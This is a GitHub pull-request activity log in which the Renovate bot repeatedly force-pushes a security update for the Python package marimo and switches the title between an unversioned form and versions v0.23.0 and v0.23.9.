@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 9993c4f to 7103775 on May 22, 2026 20:42
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on May 22, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 7103775 to d5bc079 on May 23, 2026 02:29
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo [security]" to "chore(deps): update dependency marimo to v0.23.0 [security]" on May 23, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from d5bc079 to d196089 on May 28, 2026 18:33
@renovate renovate Bot changed the title from "chore(deps): update dependency marimo to v0.23.0 [security]" to "chore(deps): update dependency marimo [security]" on May 28, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from d196089 to f435040 Compare May 28, 2026 22:50
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] May 28, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from f435040 to ae70632 Compare June 1, 2026 19:35
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Jun 1, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from ae70632 to 94e055c Compare June 2, 2026 00:41
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Jun 2, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 94e055c to 697147b Compare June 11, 2026 14:51
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Jun 11, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 697147b to ef21641 Compare June 12, 2026 00:28
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Jun 12, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from ef21641 to 293f640 Compare June 18, 2026 19:54
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo [security] Jun 18, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 293f640 to 7735140 Compare June 19, 2026 01:42
@renovate renovate Bot changed the title chore(deps): update dependency marimo [security] chore(deps): update dependency marimo to v0.23.0 [security] Jun 19, 2026
@renovate renovate Bot force-pushed the renovate/pypi-marimo-vulnerability branch from 7735140 to de05428 Compare June 20, 2026 18:12
@renovate renovate Bot changed the title chore(deps): update dependency marimo to v0.23.0 [security] chore(deps): update dependency marimo to v0.23.9 [security] Jun 20, 2026